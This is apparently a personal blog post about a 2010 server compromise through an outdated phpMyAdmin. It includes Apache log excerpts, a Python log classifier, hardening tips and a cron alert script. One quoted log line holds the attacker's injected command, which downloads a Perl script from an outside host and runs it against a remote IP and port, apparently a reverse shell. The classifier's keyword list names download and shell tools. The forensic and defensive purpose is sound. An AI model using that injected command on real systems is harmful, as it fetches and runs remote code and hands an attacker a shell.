server hacked

Recently my server was hacked. Looking at the Apache logs, I found weird entries close to the date of the hack (determined from the creation date of the /var/www/.bash_history file, which contained the bash history of the nobody user with the corresponding hack instructions):

194.2.70.187 - - [17/May/2010:21:26:33 +0200] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 511 "-" "-"
194.2.70.187 - - [17/May/2010:21:31:21 +0200] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 511 "-" "-"

Such entries appeared many times, from different IP addresses. What is strange is that it looks like the hacker was looking for a flaw in phpMyAdmin, with many attempts to access it:

91.121.9.105 - - [17/May/2010:18:17:24 +0200] "GET /phpmyadmin/config.inc.php?w=uname HTTP/1.1" 200 182 "-" "curl/7.18.2 (i486-pc-linux-gnu) libcurl/7.18.2 OpenSSL/0.9.8g zlib/1.2.3.3 libidn/1.8 libssh2/0.18"
91.121.9.105 - - [17/May/2010:18:17:24 +0200] "GET /phpmyadmin/config.inc.php?q=uname HTTP/1.1" 200 182 "-" "curl/7.18.2 (i486-pc-linux-gnu) libcurl/7.18.2 OpenSSL/0.9.8g zlib/1.2.3.3 libidn/1.8 libssh2/0.18"

Attacks on phpMyAdmin were attempted under multiple names: /phpmyadmin, /pma, /phpMyAdmin…

Worst of all, it looks like my server was hacked via phpMyAdmin (I must admit it might not have been up-to-date):

188.24.224.56 - - [17/May/2010:23:27:51 +0200] "GET /phpmyadmin/config/config.inc.php?d=cd%20/tmp;wget%20rehashing.ucoz.com/cb.pl;perl%20cb.pl%2085.185.70.251%2017272 HTTP/1.1" 200 419 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"

It was with this request that the hackers downloaded their script…
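A defender-side companion to the log review above. The Python script below is an added example, not code from the original post: it parses Apache combined-format access log lines and tags the three patterns the post singles out (the DFind "w00tw00t" scanner probe, requests to phpMyAdmin under its common aliases, and shell commands smuggled through config.inc.php query parameters), then lists the injection requests the server answered with 200, which are the ones worth inspecting first. The sample lines are three of the post's own entries re-typed with ASCII quotes plus two constructed lines from documentation-range addresses; the regular expression, the tag names and the keyword list are my own choices.

```python
"""Tag suspicious requests in Apache combined-format access logs (added example, not the post's code)."""
import re
from collections import defaultdict
from urllib.parse import unquote

# One combined-log-format line: client, identd, user, timestamp, request, status, size, referer, UA.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# First path segments under which phpMyAdmin was probed in the post (matched case-insensitively).
PMA_NAMES = {"phpmyadmin", "pma"}
# Shell fragments that appeared in the injected query strings: uname probes, then cd/wget/perl.
# This keyword list is an assumption of the example, not a list from the post.
CMD_WORDS = ("uname", "wget", "curl", "perl", "cd ", "/tmp")

# Constructed sample: the post's entries re-typed with ASCII quotes, plus a 404 probe of the
# /phpMyAdmin alias and one benign request from documentation-range addresses (203.0.113.0/24).
SAMPLE_LOG = [
    '194.2.70.187 - - [17/May/2010:21:26:33 +0200] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 511 "-" "-"',
    '91.121.9.105 - - [17/May/2010:18:17:24 +0200] "GET /phpmyadmin/config.inc.php?w=uname HTTP/1.1" 200 182 "-" "curl/7.18.2 (i486-pc-linux-gnu) libcurl/7.18.2 OpenSSL/0.9.8g zlib/1.2.3.3 libidn/1.8 libssh2/0.18"',
    '188.24.224.56 - - [17/May/2010:23:27:51 +0200] "GET /phpmyadmin/config/config.inc.php?d=cd%20/tmp;wget%20rehashing.ucoz.com/cb.pl;perl%20cb.pl%2085.185.70.251%2017272 HTTP/1.1" 200 419 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"',
    '203.0.113.5 - - [17/May/2010:19:02:10 +0200] "GET /phpMyAdmin/ HTTP/1.1" 404 486 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [17/May/2010:12:00:00 +0200] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
]


def parse_line(line):
    """Return the fields of one log line as a dict, or None if the line is not combined format."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(entry):
    """Return the list of tags that apply to one parsed entry (empty list means nothing suspicious)."""
    tags = []
    path = unquote(entry["path"])           # decode %20 etc. so the shell words become visible
    if "w00tw00t" in path:
        tags.append("scanner-probe")        # the DFind scanner signature quoted in the post
    resource, _, query = path.partition("?")
    segments = resource.lower().split("/")
    first = segments[1] if len(segments) > 1 else ""
    if first in PMA_NAMES:
        tags.append("phpmyadmin-access")
        if resource.lower().endswith("config.inc.php") and query:
            tags.append("pma-config-query")  # config.inc.php should never take query parameters
            if any(word in query for word in CMD_WORDS):
                tags.append("command-injection")
    return tags


def scan(lines):
    """Tag every parsable line; return per-IP tag sets and the injection requests answered with 200."""
    by_ip = defaultdict(set)
    answered = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue                        # skip malformed or non-combined lines rather than crash
        tags = classify(entry)
        by_ip[entry["ip"]].update(tags)
        if "command-injection" in tags and entry["status"] == "200":
            answered.append(entry)          # the script accepted the request: inspect these first
    return dict(by_ip), answered


if __name__ == "__main__":
    per_ip, hits = scan(SAMPLE_LOG)
    for ip, tags in sorted(per_ip.items()):
        print(f"{ip:16} {', '.join(sorted(tags)) or 'clean'}")
    print(f"\n{len(hits)} injection request(s) answered with 200:")
    for e in hits:
        print(f"  {e['ts']}  {e['ip']}  {unquote(e['path'])}")
```

To run it over a real log, feed the lines of /var/log/apache2/access.log to scan() instead of SAMPLE_LOG. Decoding the URL before matching matters: the payload in the post is percent-encoded, so a search for "wget " on the raw line would miss it.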

What have we learned?

  1. try to keep your server up-to-date as much as possible (apt-get dist-upgrade)
  2. to prevent hacks, avoid the default names used to reach popular scripts. In my case, I changed the /phpmyadmin URL to a more obscure, less standard name:
    1. modify /etc/apache2/conf.d/phpmyadmin.conf and replace /phpmyadmin with a more obscure name (e.g. myphpmyadmin)
    2. check the Apache config: apache2ctl configtest
    3. restart Apache: /etc/init.d/apache2 restart

How to detect attacks quickly?

I've made a simple script that checks for the existence of a .bash_history file for the anonymous user in key locations and sends an email alert so that it can be investigated further. I've scheduled this script to run daily by putting it into /etc/cron.daily, so that next time I will be able to act quickly if the same hack occurs. Here is the script:

#!/bin/sh
# this script tries to detect if server has been compromised looking for .bash_history file for user nobody
# author: Remy Damour
# date: June, 18, 2010

# address that receives the alert; ALERT_RECIPIENT is a placeholder, set it to your own address
recipient="${ALERT_RECIPIENT:-root}"

# locations where a shell history left behind by the web-server user would show up
files="/var/www/.bash_history /tmp/.bash_history"

for i in $files
do
    if [ -f "$i" ]; then
        current_script=$(readlink -f "$0")
        # ls -l shows the modification time, which for a freshly dropped file is the hack date
        creation_date=$(ls -l "$i")
        bash_content=$(cat "$i")
        echo "automatic check run by script $current_script

[possible hack]
following file was found for anonymous user: $i

[hack date] (= file-creation-date)
$creation_date

[executed commands]
$bash_content

[next steps]
- remove unexpected files found in /tmp (esp. perl scripts with .pl extension)
- run 'ps aux' and kill all processes launched by www-data user
- check apache logs /var/log/apache2/access.log at hack-date to see faulty script" | mail -s "[Alert] Server hacked!" "$recipient"
    fi
done

sources

One Comment

  1. Nasa Says:

    Very informative!
